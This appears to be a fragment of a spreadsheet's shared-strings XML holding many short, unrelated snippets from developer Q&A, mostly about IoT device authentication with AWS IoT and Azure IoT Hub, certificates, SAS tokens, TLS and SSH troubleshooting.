    <t>Try , 
choose interface option, say 'no' to first message ("kernel login"), 'yes' to second message ("serial communication on").</t>
  </si>
  <si>
    <t>Cognito Unauthenticated Pool:
In this case, IoT does not do any scopedown(IoT's AttachPolicy call in not required) and policy at the pool level will determine what user can do with IoT resources.</t>
  </si>
  <si>
    <t>If you're confused or if you need informations about credentials,look this example:
https://github.com/aws/aws-iot-device-sdk-js/blob/fd0807e20a0d79c721cfb3b85622392f0c65e7e1/examples/browser/mqtt-explorer/index.js
The configurations files are in the same documentation.</t>
  </si>
  <si>
    <t>If you only able to use the REST, you can refer the code in the link above to generate the SAS token and send a register device retry request using that token.</t>
  </si>
  <si>
    <t>To be absolutely sure you can add guards around your #include:
Looking at the source code here - https://github.com/arkhipenko/TaskScheduler/blob/master/src/TaskScheduler.h
this was clearly not meant to be included twice.</t>
  </si>
  <si>
    <t>IoT Hub Free edition enables you to transmit up to a total of 8,000 messages per day, and register up to 500 device identities.</t>
  </si>
  <si>
    <t>NWebsec is a collection of open source security libraries that manage security headers for ASP.NET applications.</t>
  </si>
  <si>
    <t>This is especially important for interoperability or to specifically control security issues at the level of the message or message part.</t>
  </si>
  <si>
    <t>Secure logging using TLS: Log messages may contain sensitive information that should not be accessed by third parties.</t>
  </si>
  <si>
    <t>opts {Object} route options:
examples:
{ssl : true} // Will use default ssl certificates.</t>
  </si>
  <si>
    <t>Based on own high-performance async and lock-free Java Redis client
https://github.com/mrniko/redisson</t>
  </si>
  <si>
    <t>Programmatically run a request that checks for the verification token and validates that the authenticated user is an owner of the domain or site.</t>
  </si>
  <si>
    <t>AWS IoT can support billions of devices and trillions of messages, and can process and route those messages to AWS endpoints and to other devices reliably and securely.</t>
  </si>
  <si>
    <t>Built-in tools for caching, encoding, sessions, authorization, static content, and others.</t>
  </si>
  <si>
    <t>It will also automatically sync files without asking for confirmation (auto = true) and will store backups of files that are overwritten when they are synced in /home/user/Unison-Backups.</t>
  </si>
  <si>
    <t>This object represents the security context of the user on whose behalf the code is running, including that user's identity (IIdentity) and any roles to which they belong.</t>
  </si>
  <si>
    <t>There are several alternatives including
django-allauth :https://github.com/pennersr/django-allauth
django-registration-redux : https://github.com/macropin/django-registration/
Useful links
Documentation</t>
  </si>
  <si>
    <t>Drupal core modules define a standard set of permissions, such as "administer users," "administer content," and "view content."</t>
  </si>
  <si>
    <t>Collecting pip
  Could not fetch URL https://pypi.python.org/simple/pip/: There was a problem confirming the ssl certificate: Can't connect to HTTPS URL because the SSL module is not available.</t>
  </si>
  <si>
    <t>I'm struggling with the client cert and private key embedding or uploading, in order to authenticate with the AWS IoT endpoint assigned to my account.</t>
  </si>
  <si>
    <t>The datasheet says to write 87h twice to to the regsiter 2Eh but on trying to do so I get an exception thrown by Visual Studio that the 3rd line is a 'privileged instruction'.</t>
  </si>
  <si>
    <t>I was looking at this issue myself, and found this:
https://gist.github.com/jcw/1985789#file-bootcheck-ino
This is to look up the bootloader; but I'm thinking that something like this could be used for determining a signature of some sort for the code as a whole.</t>
  </si>
  <si>
    <t>Please check the client ID and make sure that multiple instances of the same app use a unique client ID.</t>
  </si>
  <si>
    <t>If you are trying to run this under IDLE,  ANSI escape codes won't work properly there - IDLE is simulating a minimal terminal and uses some colors for it's own warning and error messages.</t>
  </si>
  <si>
    <t>From my experience, you would have to set up the provisioning of each downstream devices individually and have the mechanism that will assign parent device(IoT Edge device) to the downstream device if you are using x.509 certificates.</t>
  </si>
  <si>
    <t>google-api-ruby-client is configured to access Google Cloud Platform services and authorize (OAuth 2.0) automatically on your behalf provided proper environment setup.</t>
  </si>
  <si>
    <t xml:space="preserve"> of fat_free_crm needs gem "scrypt" version 2.0.2 (https://rubygems.org/gems/scrypt/versions/2.0.2) but I get this error:
I can't find anything about this on the interwebs and I don't understand it myself.</t>
  </si>
  <si>
    <t>If you upload your certificate signing request (CSR) via the AWS IoT Console, it displays a download link that you can get your certificate file.</t>
  </si>
  <si>
    <t>I am trying to login as admin using mobile device and after successful login, I am setting cookie in response header.</t>
  </si>
  <si>
    <t>You didn't share the URL you're accessing, so suppose it's
In that case,
http://www.example.com/something?foo=1
might cause the proxy to bypass the cache.</t>
  </si>
  <si>
    <t>Also, this tool allows to generate a full uri address with a sas token for those containers.</t>
  </si>
  <si>
    <t>The client is currently configured to not verify the server authenticity either by certificate fingerprint or certificate chain.</t>
  </si>
  <si>
    <t>When I select  Disallow configuring Wifi restriction and publish the policy, it does not effect the device.</t>
  </si>
  <si>
    <t>According to 10): p12 file: if available, then I don't have to create keys and certificates dynamically every time I need to access this MQTT service?</t>
  </si>
  <si>
    <t>After creating the account there and typing in the new settings like ftp server address, username, password and so on I got the message "Login sucessful".</t>
  </si>
  <si>
    <t>Note: Due to SDK limitations, I can't use accessKeyId and secretAccessKey to authorize my connections to IOT, I can use certificates.</t>
  </si>
  <si>
    <t>Example and info about http-headers
Discussion about Vodafone proxy detection and redirection</t>
  </si>
  <si>
    <t>When a user logs into a computer, an access token is generated that contains user and group SIDs and user privilege level.</t>
  </si>
  <si>
    <t>ErrorCode:BlobContainerValidationError;Unauthorized to write to output blob container.</t>
  </si>
  <si>
    <t>I'm aware that the sendall() method in client automatically sends over data that is lost(or corrupted ?)</t>
  </si>
  <si>
    <t>Could anyone suggest how I can create a self signed cert using my existing CAs?</t>
  </si>
  <si>
    <t>I'd like to enabled hostname validation in Azure SDK (C), in the similar way how it is done by means of ssl library, for example:</t>
  </si>
  <si>
    <t>It looks like the certs are getting created fine but I still would like to know how to get rid off this warning.</t>
  </si>
  <si>
    <t>And now I want to use these newly generated deviceCertificate-PrivateKey to securely connect AWS IOT endpoint(on port 8883) for MQTT.</t>
  </si>
  <si>
    <t>A camera module could look like this;
In the same way you could create an email module with a function send_mail(sender, password, recipient, attachments).</t>
  </si>
  <si>
    <t>Authenticating users to enter the application created by PHP Laravel, using the Auth::attempt method.</t>
  </si>
  <si>
    <t>Django signals allow listeners to be registered for events within the framework.</t>
  </si>
  <si>
    <t>All channels are private so users can only listen to events you subscribe them to.</t>
  </si>
  <si>
    <t>The login flows generate an access token, which you can use to make API calls on behalf of a user.</t>
  </si>
  <si>
    <t>Looks very promising for storing tokens and URLS.</t>
  </si>
  <si>
    <t>Is there a problem with the SAS key generating code or my blob container is not having Write permission?</t>
  </si>
  <si>
    <t>Since I was using  SDK, with manually created certificates, I was usually connecting my device like this:
But now I don't have certificate and key to include in keyPath and certPath and I cannot instantiate my device without it.</t>
  </si>
  <si>
    <t>I don't know how you get the token,but I think you can use Device Explorer tool to generate the SAS token.</t>
  </si>
  <si>
    <t>Rack::Attack is a rack middleware to protect your web app from bad clients.</t>
  </si>
  <si>
    <t>My stack creates successfully, however, I can't access the certificate file that CloudFormation creates.</t>
  </si>
  <si>
    <t>At that time, other clients should not be able to impersonate it.</t>
  </si>
  <si>
    <t>LibreSSL is a version of the tls/ssl/crypto stack forked from openssl in 2014.</t>
  </si>
  <si>
    <t>I have the request working, and I know I'm getting valid JSON.</t>
  </si>
  <si>
    <t>After have been investigating my problem for weeks I have found some information from the hexdump of the context(I got one without C/R error (links at the end of this question, but no restart success)) (context-num0-0-0, DropBox)
Seems that checkpointing works.</t>
  </si>
  <si>
    <t>The initial setup works great:
My challenge comes when I try to read the event information that is stored in the anonymous linux file created by the GPIO_GET_LINEEVENT_IOCTL call.</t>
  </si>
  <si>
    <t>A command in Windows systems (not available in home editions) that allows the users with administrator privileges to create records  in event log with custom IDs and messages.</t>
  </si>
  <si>
    <t>It allows client applications to encrypt sensitive data without revealing the encryption keys to the database engine, so the data cannot be accessed either in flight on the wire or at rest on SQL Server.</t>
  </si>
  <si>
    <t>App Engine-specific helpers make quick work of authenticated calls to APIs, and you do not need to worry about exchanging code for tokens.</t>
  </si>
  <si>
    <t>Once logged in on the pi I type
than I get the message
xterm: No absolute path found for shell: DISPLAY
I am really confused why I am getting this message.</t>
  </si>
  <si>
    <t>From Intel's web page, it's suggested to upgrade the firmware to latest version in order to get the latest fix and feature.</t>
  </si>
  <si>
    <t>My ssl certificates are located in: 
/etc/nginx/ssl
Also after I check the syntax of owncloud.conf it gives me:
2016/08/19 14:03:02 [emerg] 1513#1513: "server" directive is not allowed here in /etc/nginx/conf.d/owncloud.conf:6
  nginx: configuration file /etc/nginx/conf.d/owncloud.conf test failed</t>
  </si>
  <si>
    <t>Trying to use the WiFi Adapter on a Raspberry Pi 3, using Windows 10 IoT
Code I'm trying to run:
I do have the capability defined in the Package.appxmanifest:
When it tries to execute wifi.ScanAsync(), it just throws this error:
Access is denied.</t>
  </si>
  <si>
    <t>In order to add a geofencing rule, I opened geo dashboard running on https//localhost:9445/portal/dashboards/geo-dashboard/, authenticated with admin account and able to login.</t>
  </si>
  <si>
    <t>There is no possibility that my client can directly go through MQTT over websockets, due to my device being restricted to only communicated through another protocol over Websockets.</t>
  </si>
  <si>
    <t>I copied the "Connection string - primary key" from the iothubowner menu under settings: shared access policies.</t>
  </si>
  <si>
    <t>By exchanging the id token with with aws.config.credentials i am successfully retrieving the access key id, secret key and session token.</t>
  </si>
  <si>
    <t>The following is a example of a TX Request frame with retries disable:
7E 00 0F 10 01 00 13 A1 00 40 AA D0 06 FF FE 00 01 04 78
For you to disable the acknowledgement you need to set 0x00 on Frame ID of TX Request.</t>
  </si>
  <si>
    <t>Auto registration of devices is temporarily disabled and so if a device does not exist (because the client ID is wrong) then the gateway device will be disconnected.</t>
  </si>
  <si>
    <t>In cases when a shared access policy is
  used to access device functionality, the solution must consider the
  component issuing the security token as a trusted subcomponent.</t>
  </si>
  <si>
    <t>In other words, when you're logging out the retrieved identity: to the console, the credentials object should already have your secret key, access key id, and session token in it.</t>
  </si>
  <si>
    <t>Another way would be to have a look onto this great blogpost from the lexicon guys: https://blog.thesparktree.com/generating-intranet-and-private-network-ssl, from those described steps I basically developed the playbook from.</t>
  </si>
  <si>
    <t>People talk about the "signaling servers" because in the case of two browsers they can't directly connect to each other with something like a WebSocket or a HTTP request.</t>
  </si>
  <si>
    <t>Note: Don't forget to add sudo at the beginning of that command,or to run as root, otherwise your pi will throw: dpkg: error: requested operation requires superuser privilege
:)</t>
  </si>
  <si>
    <t>If that is your question, I don't have the accurate answer, but from my experience, Edge Hub is back online after 30-60sec after connectivity is restored.</t>
  </si>
  <si>
    <t>PDF417 is a stacked linear barcode symbol format used in a variety of applications, primarily transport, identification cards, and inventory management.</t>
  </si>
  <si>
    <t>Stunnel is a proxy designed to add TLS encryption functionality to existing clients and servers without any changes in the programs' code.</t>
  </si>
  <si>
    <t>The features are:
leak detection
heap usage
heap diffing
The project home page: https://github.com/lloyd/node-memwatch</t>
  </si>
  <si>
    <t>Caching (caching) - Allow proxy entities to respond to requests before the request reaches the target server.</t>
  </si>
  <si>
    <t>CredSSP enables a program to use client-side SSP to delegate user credentials from the client computer to the target server.</t>
  </si>
  <si>
    <t>it manages a client side session and synchronizes that across tabs/ windows
it authenticates users against the application's own server, external providers like Facebook etc.</t>
  </si>
  <si>
    <t>This redirect now includes the token and their payer ID
At this point, you may request the user's payment details (including their address) from PayPal.</t>
  </si>
  <si>
    <t>Further Reading
https://github.com/marklogic/corb2
CORB Stages
Addition Properties
Encryption
Related tags : marklogic</t>
  </si>
  <si>
    <t>Other web servers will let you talk to any language as a backend, but they insist on using HTTP proxying or FastCGI, which is not friendly to asynchronous operations.</t>
  </si>
  <si>
    <t>My questions: 
Does a predefined detection strategy for the communication with IoTHub via AMQP exist?</t>
  </si>
  <si>
    <t>So I ensured that I was able to make HTTPS connections (after verifying the SSL root certificate) with the following code, this worked but did not help.</t>
  </si>
  <si>
    <t>What I found is that in python 3.3 you can give an additional context argument instarttls and you should be able to define some cipher parameters in this context.</t>
  </si>
  <si>
    <t>When the certificates are transported improperly, it is possible to leave images of them in temp files, memory, cache and the local filesystems.</t>
  </si>
  <si>
    <t>This may be a temporary condition such as after the listener has started, but before the database instance has registered with the listener.</t>
  </si>
  <si>
    <t>This leaves me to believe that java is not given access to creating a socket, binding the port and that it is not the code but a security measure on the raspberry pi.</t>
  </si>
  <si>
    <t>There is a lack of documentation when it comes to Group Enrollment in Azure Device Provisioning Service.</t>
  </si>
  <si>
    <t>It only has some boxes of headers &amp; values which I can leave Authorization etc in it (see the screenshot here https://imgur.com/RI815EZ) 
Any advice?</t>
  </si>
  <si>
    <t>Furthermore, all event handlers need to be registered before the respective events have a chance to be fired.</t>
  </si>
  <si>
    <t>Time series requires token to be generated from Active Directory, but it's easy to setup.</t>
  </si>
  <si>
    <t>It is used to create and update the flat-files used to store usernames and password for basic authentication of HTTP users.</t>
  </si>
  <si>
    <t>DES was published in 1977 based on IBM's previous work on the Lucifer cipher with an expected life span of 10 years.</t>
  </si>
  <si>
    <t>This event listener can be used to show a confirmation dialog to the user on page leave.</t>
  </si>
  <si>
    <t>Since I plan to use it via SSH from other locations, I was looking for a way to lock the console on the actual machine.</t>
  </si>
  <si>
    <t>Discovery program tries to create sockets to every possible IP address to find the peer IP.</t>
  </si>
  <si>
    <t>Every time the user requests for a password reset a code is created and I want to reset this code every 12 hours after it has been created.</t>
  </si>
  <si>
    <t>I've also tried with port 9763 as given in stackoverflow question but in that case, it's not even able to authenticate.</t>
  </si>
  <si>
    <t>It's not a genuine interrupt but schedules a .NET event, and in the EventArgs is contained a timestamp of when the pin value changed.</t>
  </si>
  <si>
    <t>the session key is established with two messages exchanges between the two nodes.</t>
  </si>
  <si>
    <t>-WSO2 IoT Server 3.1.0 RC-
I configured ip, created certificates, started broker server and  then core.</t>
  </si>
  <si>
    <t>*/
        val identity = LowpanIdentity.Builder()
                .setName("MeshNetwork")
                .build()
        /* Not specifying a LowpanCredential here tells form()
         * that we want the interface to generate the master key
         * for us.</t>
  </si>
  <si>
    <t>If a certain event is detected from this data analysis, an event should be logged.</t>
  </si>
  <si>
    <t>I don't know what you have under /home/Client5, but if it's a regular user, this setup is highly insecure.</t>
  </si>
  <si>
    <t>zxing.net is a library which supports decoding and generating of barcodes</t>
  </si>
  <si>
    <t>For example, Boost.Iostreams can be used to create streams to access TCP connections or as a framework for cryptography and data compression.</t>
  </si>
  <si>
    <t>Without that website's certificate and private key, you cannot impersonate it without generating errors.</t>
  </si>
  <si>
    <t>So could it be because of the format of the client keys or what should I give as certificates?</t>
  </si>
  <si>
    <t>Error in token retrieval - setupTokenPairByPasswordGrantType(x, y)
Please help to solve this.</t>
  </si>
  <si>
    <t>Error message :
UriFormatException: Invalid URI: The URI scheme is not valid.</t>
  </si>
  <si>
    <t>Graphics Interchange Format Java Archives (GIFAR) is malware that allows a hacker to piggy back off the victims HTTP cookies</t>
  </si>
  <si>
    <t>In the past WhatsApp used different formats to store the messages, such as .crypt7 or .crypt8.</t>
  </si>
  <si>
    <t xml:space="preserve"> and modified_after="1496508764" are not valid headers.</t>
  </si>
  <si>
    <t>I just have occasional problems with the socket file access when my program is improperly terminated which then requires me to "clean" the directory by manually deleting the socket file.</t>
  </si>
  <si>
    <t>The script can be found here:https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Windows-10:-Add-admin-account
If anyone knows how to reverse this that would be real nice.</t>
  </si>
  <si>
    <t>The document says the following:
My difficulty is - if "registration ID" is deviceID, and an X509 certificate has only one common name, how am I supposed to provision multiple devices in a group?</t>
  </si>
  <si>
    <t>I assume since you are writing a solution for an exact use case, just predefine the xml response to this request and with a single profile and a hardcoded token.</t>
  </si>
  <si>
    <t>Reason:
The link provided was not working the first day I signed up for Microsoft insider, but same link worked the next day, Probably Microsoft takes some time to setup an insider account behind the scene.</t>
  </si>
  <si>
    <t>If you look at the Windows Runtime classes related to certificates you wont find any method to explicitly request access to the certificate private key, so what is the app developer to do?</t>
  </si>
  <si>
    <t>Had you waited some extra time, the issue would've resolved on its own eventually (as long as the cert doesn't expire before the OS would see it as valid).</t>
  </si>
  <si>
    <t>IP redirection
This will add IP redirection so that all HTTP requests are answered by your raspi:
Webserver
You already said, you can setup a webserver on a server.</t>
  </si>
  <si>
    <t>The library relies internally on the Paho MQTT client, which is not exposed transitively to callers as part of it's public API (i.e.</t>
  </si>
  <si>
    <t>Cosm, formerly known as Pachube, lets you collect data from embedded devices in its time-series database exposed via a RESTful API over HTTP, WebSocket, plain TCP or even MQTT.</t>
  </si>
  <si>
    <t>PKCS#15 establishes a standard that enables users in to use cryptographic tokens to identify themselves to applications, regardless of the application's cryptoki (PKCS#11 or other token interface) provider.</t>
  </si>
  <si>
    <t>Key capabilities
Send relevant, engaging messages
Firebase In-App Messaging sends messages when they're most needed: while users are actually in your app.</t>
  </si>
  <si>
    <t>Form field protection also applies to content controls: when the document is protected as a form content controls can be available for editing.</t>
  </si>
  <si>
    <t>A WCF binding is a combination of encoding, protocol, and transport details used by WCF web services and clients to communicate with eachother.</t>
  </si>
  <si>
    <t>I intercepted using fiddler how sdk makes register call and noted that sdk first gets 401 with above error and then it reissues another request which succeeds.</t>
  </si>
  <si>
    <t>It gives you Metrics, Tracing and Context Propagation APIs without locking you to any specific vendor.</t>
  </si>
  <si>
    <t>Furthermore, the API was designed to be as non-intrusive as possible and as a result, Byte Buddy does not leave any trace in the classes that were created by it.</t>
  </si>
  <si>
    <t>Where i need to send data to a Swagger api, but the corporate proxy on my location blocks the messages.</t>
  </si>
  <si>
    <t>Without a full chain, it is impossible to determine whether or not a verified certificate is in the devices chain of trust.</t>
  </si>
  <si>
    <t>It is a stateless protocol that can be used for name servers and distributed object management systems, through extension of its request methods, error codes and headers.</t>
  </si>
  <si>
    <t>An Ads Data Hub query is aggregated over a group of users, which allows Google to provide more complete data and still maintain end-user privacy.</t>
  </si>
  <si>
    <t>It seems the SDK, at least X.509 functionality requires an higher version of OpenSSL than 1.0.2d 9 Jul 2015.</t>
  </si>
  <si>
    <t>Denial-of-service (or DoS) is the intentional attack of a machine or resource, aiming to make unavailable to its intended users, often by overloading it with artificially crafted requests.</t>
  </si>
  <si>
    <t>Hook global events, register hotkeys, simulate key presses and much more.</t>
  </si>
  <si>
    <t>(HTML is just one example of a context where rendering user controlled input creates security vulnerabilities.)</t>
  </si>
  <si>
    <t>LibOTR is an implementation of the Off-the-Record Messaging cryptographic protocol, both created by cryptographers Ian Goldberg and Nikita Borisov.</t>
  </si>
  <si>
    <t>Private header files are an extension of C header files (*.h) and are sometimes stored in *.r files.</t>
  </si>
  <si>
    <t>Once this is complete, the client presents its certificate details to the server for verification.</t>
  </si>
  <si>
    <t>associate the public keys with identities, before accepting them as valid.</t>
  </si>
  <si>
    <t>Now again when I try to log in by passing credentials into  and after I am able to get the buffer as well as live data..</t>
  </si>
  <si>
    <t>When i try to open by IP http://192.168.56.235:9446/carbon it shows certificate error.</t>
  </si>
  <si>
    <t>Furthermore, if I end the ssh session, and try to curl on the device itself, I can still do it successfully.</t>
  </si>
  <si>
    <t>Every time I create a new skill I don't want to publish and get it to certify.</t>
  </si>
  <si>
    <t>First, create Firebase admin authentication, then:
Use  to create new values in the database.</t>
  </si>
  <si>
    <t>Please confirm you are using valid ClientID and API key for your application.</t>
  </si>
  <si>
    <t>How long the token is valid for is configured on the server.</t>
  </si>
  <si>
    <t>In this example, the employer's VPN server presents its certificate details during the initial handshake so the client can authenticate them.</t>
  </si>
  <si>
    <t>Status code: 401
  Description: b'The specified SAS token has an invalid signature.</t>
  </si>
  <si>
    <t>You need to silence it:
For your HTTP headers to be valid, you need to separate them with \r\n, not \n\n.</t>
  </si>
  <si>
    <t>I believe your problem is that your certificate's policy does not have the proper permissions to connect.</t>
  </si>
  <si>
    <t>It is also the first Bitcoin client in the network's history.</t>
  </si>
  <si>
    <t>Arduino does't support https protocol, I can use only insecure http.</t>
  </si>
  <si>
    <t>I have also tried different formats of the keys and certificates (xxx.key.pem or root_ca.crt).</t>
  </si>
  <si>
    <t>It looks like you're using an invalid ETAG value in the request.</t>
  </si>
  <si>
    <t>Unfortunately, it won't let us authenticate using windows login.</t>
  </si>
  <si>
    <t>PS: as specified in the title I do not want to use ssh or VNC.</t>
  </si>
  <si>
    <t>I would also like to authenticate users via Twitter/Facebook OAuth.</t>
  </si>
  <si>
    <t>I need to use AES encryption and Message Authentication Code MAC in my code.</t>
  </si>
  <si>
    <t>From the app-side i got 403 i.e.forbidden.</t>
  </si>
  <si>
    <t>the codes are attached below.</t>
  </si>
  <si>
    <t>Why can't I use SQL over TLS using a LetsEncrypt Certificate?</t>
  </si>
  <si>
    <t>Attaching my codes with this post.</t>
  </si>
  <si>
    <t>I am trying to use 'Authenticate using Cognito-Identity with Cognito user pool' in my Android application.</t>
  </si>
  <si>
    <t>The server's keys are located at  and /etc/pki/tls/certs/sockets_crt.pem.</t>
  </si>
  <si>
    <t>I try on different device and enroll as new user who is affected by the policy.</t>
  </si>
  <si>
    <t>How could the IoT Hub authentication work?</t>
  </si>
  <si>
    <t>At last I use certificate and connect to device via AMQP.</t>
  </si>
  <si>
    <t>( Server , topic , token authentification .. ).</t>
  </si>
  <si>
    <t>You can connect their network but can not go to the "www" without their permissions.</t>
  </si>
  <si>
    <t>I tried doing ssh-keygen -R raspberrypi.local but I'm still getting the same messages.</t>
  </si>
  <si>
    <t>Because it accepts any clientID who had certificates.</t>
  </si>
  <si>
    <t>I will get new certificate ID and CA certificate ID from MQTT topic.</t>
  </si>
  <si>
    <t>The leaf cert uses the DPS cert as its CA.</t>
  </si>
  <si>
    <t>Peer certificate information    ...
DEBUG:   iot_tls_connect L#264       cert.</t>
  </si>
  <si>
    <t>Also which block is trying to authenticate?</t>
  </si>
  <si>
    <t>All certificates are available and I can connect with the DeviceClient to the device at the hub.</t>
  </si>
  <si>
    <t>using SAS token or something like that i don't know any help ?</t>
  </si>
  <si>
    <t>My goal is to encrypt "My Message" and then decrypt it afterwords.</t>
  </si>
  <si>
    <t>I tried this work around, but it still is not working, since it seems to need a CA cert.</t>
  </si>
  <si>
    <t>Also this seems kinda hacky, I'm not sure this transport is meant for me to access in this way.</t>
  </si>
  <si>
    <t>I need to authenticate a standalone application against an app running on GAE.</t>
  </si>
  <si>
    <t>After that I ran  and I was able to get my device conncted to Azure.</t>
  </si>
  <si>
    <t>This is the command I use to generate the token.</t>
  </si>
  <si>
    <t>I have problem with login to Exchange mail through IMAP using CURL.</t>
  </si>
  <si>
    <t>I should get a https get request but I can't.</t>
  </si>
  <si>
    <t>These codes are all working in VS console application.</t>
  </si>
  <si>
    <t>This will allow more algorithms to be negotiated when connecting via SSH.</t>
  </si>
  <si>
    <t>The folder should be in /root/AWS-IoT-Python-Runtime/runtime/certs.</t>
  </si>
  <si>
    <t>You can also use x509 certificates to authenticate your device with IoT Hub.</t>
  </si>
  <si>
    <t>This upval leak in net is a bummer.</t>
  </si>
  <si>
    <t>This is me running on a raspberry pi so I need the certs.</t>
  </si>
  <si>
    <t>after that you authorize to access this apps and files.</t>
  </si>
  <si>
    <t xml:space="preserve">
says that the key was tried but not accepted by server.</t>
  </si>
  <si>
    <t>After you run it, you'll need to authenticate.</t>
  </si>
  <si>
    <t>The sample provided in the Github AndroidPubSuB is only for the unauthenticated user.</t>
  </si>
  <si>
    <t>In such a scenario, the module can get the device Id and module Id of the sender module from the message itself.</t>
  </si>
  <si>
    <t>It seems that Azure IoT Hub SDK for Java does not support multiplexing for X.509 devices.</t>
  </si>
  <si>
    <t>Yes, you can use SAS token for the symmetric key authenticated device.</t>
  </si>
  <si>
    <t>I have tried with CA certificatre Device where i settle the certificate first on the iot hub and verify it with the client and either way it doesn't work.</t>
  </si>
  <si>
    <t>Are you using SAS Token to authenticate with IoT Hub?</t>
  </si>
  <si>
    <t>Provide a cancellation token and try again.</t>
  </si>
  <si>
    <t>But there is no response for security.</t>
  </si>
  <si>
    <t>You cant connect a device to AWS IoT with an API if you are trying to use HTTPS.</t>
  </si>
  <si>
    <t>Please see this topic in MSDN forum and File access permissions.</t>
  </si>
  <si>
    <t>I use the ESP8266 and connect to AWS IoT using MQTT and x509 certificate for authentication.</t>
  </si>
  <si>
    <t>If there is no way of updating the certificate on the device, the device may not be able to subsequently connect to the IoT Hub (or any other cloud service).</t>
  </si>
  <si>
    <t>You need to use a client library with TLS such as WiFiClientSecure to connect to an HTTPS server.</t>
  </si>
  <si>
    <t>mod-proxy is the proxying module for the Apache HTTP server.</t>
  </si>
  <si>
    <t>Jailshell is a very limited shell that allows clients to logon to your server via SSH.</t>
  </si>
  <si>
    <t>django-authopenid is a pluggable Django app that allows you to authenticate your users while using the django auth contrib</t>
  </si>
  <si>
    <t>Security Token Service.</t>
  </si>
  <si>
    <t>TLS (Transport Layer Security) version 1.3 is a security protocol.</t>
  </si>
  <si>
    <t>GENERAL SSH SUPPORT IS OFF-TOPIC.</t>
  </si>
  <si>
    <t>ORA-28001: The password has expired</t>
  </si>
  <si>
    <t>django-authopenid is a pluggable Django app that allows you to authenticate your users while using the django auth contrib.</t>
  </si>
  <si>
    <t>It is a Security Token Service.</t>
  </si>
  <si>
    <t>With 802.11 standard it might be a mac-address of client devices settuping an  ad-hoc network.</t>
  </si>
  <si>
    <t>GitHub: https://github.com/auth0/express-jwt</t>
  </si>
  <si>
    <t>The RSA and AES-CBC en-/decryption are compatibility with OpenSSL.</t>
  </si>
  <si>
    <t>http://www.w3.org/TR/WebCryptoAPI/</t>
  </si>
  <si>
    <t>Honest &amp; transparent fees -- No more opaque fees.</t>
  </si>
  <si>
    <t>It uses keys to access its contents.</t>
  </si>
  <si>
    <t>websockify: a WebSockets to generic TCP sockets proxy/bridge.</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Aadhaar</t>
  </si>
  <si>
    <t>Perhaps the most well-known protocol that uses TLS is the HTTPS protocol, which is the HTTP protocol running over TLS.</t>
  </si>
  <si>
    <t>We can generate policy using the below artisan command :
Reference :
https://laravel.com/docs/5.8/authorization</t>
  </si>
  <si>
    <t>Access is via unsecured TCP/IP, TLS or SSL.</t>
  </si>
  <si>
    <t>An attacker who interposes himself between a client and a server.</t>
  </si>
  <si>
    <t>I am trying to set up my own secure proxy to be utilised by a Django Python script I have written that depends on a secure proxy to return an https request correctly.</t>
  </si>
  <si>
    <t>The Cross-Origin Resource Sharing is a security feature embedded in every recent web browser which defines a way in which the browser and the server can interact to determine whether or not to allow the cross-origin request.</t>
  </si>
  <si>
    <t>This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet.</t>
  </si>
  <si>
    <t>SSLv2 has been deprecated in favor of SSLv3 because it "contained a number of security flaws which ultimately led to the design of SSL version 3.0"
Please see SSLv3 for the updated and preferred method to use SSL</t>
  </si>
  <si>
    <t>Mongrel2 supports 17 languages and platforms, HTTP, Flash sockets, WebSockets, Long Polling, and many ways to deploy and hack on it.</t>
  </si>
  <si>
    <t>Reason of the error
The error occurs because  extension in the CA certificate, which means that the certificate is CA so this certificate is able to sign other public keys to generate client certificates, is not set to TRUE.</t>
  </si>
  <si>
    <t>I have uploaded a signed version to the Things console, and used this to generate a custom build.</t>
  </si>
  <si>
    <t>The final question mark is the quantifier that makes the previous token optional.</t>
  </si>
  <si>
    <t>After this if I try to get the data with the same way by starting my application and passing credentials I do not get buffer as well as live data from the machine.</t>
  </si>
  <si>
    <t>GDS Code: 335544323 Error Code: 3 )
The credentials I provided seem to be set correctly, as I can use them to create and connect any other Database, such as the sample one.</t>
  </si>
  <si>
    <t>You haven't posted what the error is but I'm guessing it is an access type error, have you done the part at the end of the install for linux?</t>
  </si>
  <si>
    <t>I have created a similar functionality
See if you find it helpful
You need to get the permission to use Internet.</t>
  </si>
  <si>
    <t>Most NASes offer many accessing algorithms (like Samba, FTP, SSH and many more) and can host a website, stream multimedia and do many more tasks.</t>
  </si>
  <si>
    <t>Qt Network
 New SSL back-end for iOS and OS X based on Secure Transport.</t>
  </si>
  <si>
    <t>This handler will create a signature for your multipart request that is sent to S3.</t>
  </si>
  <si>
    <t>Now, I am a bad guy and I detect the GET request's structure.</t>
  </si>
  <si>
    <t>Common authentication and configuration problems are off-topic for Stack Overflow.</t>
  </si>
  <si>
    <t>I am trying to create a X 509 certificate and upload it to Azure Portal.</t>
  </si>
  <si>
    <t>TL;DR Just access the device like any other HID device with pyUSB, and use control messages for the OUT (Pi=&gt;device) direction.</t>
  </si>
  <si>
    <t>Using the same token for multiple ESPs is a bad and unstable approach.</t>
  </si>
  <si>
    <t>Once an ID Token is received, it can be verified to authenticate the end user.</t>
  </si>
  <si>
    <t>While running the Bluetooth server/listener on the Pi, I get the Invalid Exchange socket error.</t>
  </si>
  <si>
    <t>I test "hl1234" as device leaf certificate CN, it is valid.</t>
  </si>
  <si>
    <t>The proper way is to use TLS 1.2, with the use of embedded certificates.</t>
  </si>
  <si>
    <t>The final solution I used now is using a Letsencrypt.</t>
  </si>
  <si>
    <t>EINVAL (accept4()) invalid value in flags.</t>
  </si>
  <si>
    <t>I'm trying to connect to this API https://strike.acinq.co/documentation/api-reference
EXAMPLE CURL REQUEST IN API'S DOCUMENTATION:
Here is my Arduino code, I am using the ArduinoJson.h and WiFi.h libraries:
A 401 "Invalid API Key" Is the closest I have got.</t>
  </si>
  <si>
    <t>The REST API identifies Twitter applications and users using OAuth; responses are in JSON format.</t>
  </si>
  <si>
    <t>So for me, I had 2 things misconfigured which prevented successful deployment
The deployment was stuck "in progress" because the permissions in the policy and role that were attached needed lambda permissions to deploy.</t>
  </si>
  <si>
    <t>Furthermore there aren't any wires, which would allow 'unfettered communication'.</t>
  </si>
  <si>
    <t>I'm not even sure who my token provider is - my webapp, or Google?</t>
  </si>
  <si>
    <t>I setup my raspberry with hostname but I cannot reach with SSH or WEB browser by my MacBookPro (running under maverick).</t>
  </si>
  <si>
    <t>Here is my script:
#!/bin/bash
sleep 30
WANIP=$(curl ident.me; echo)
echo "$WANIP"
curl -s \
-F "token=MYTOKENGOESHERE" \
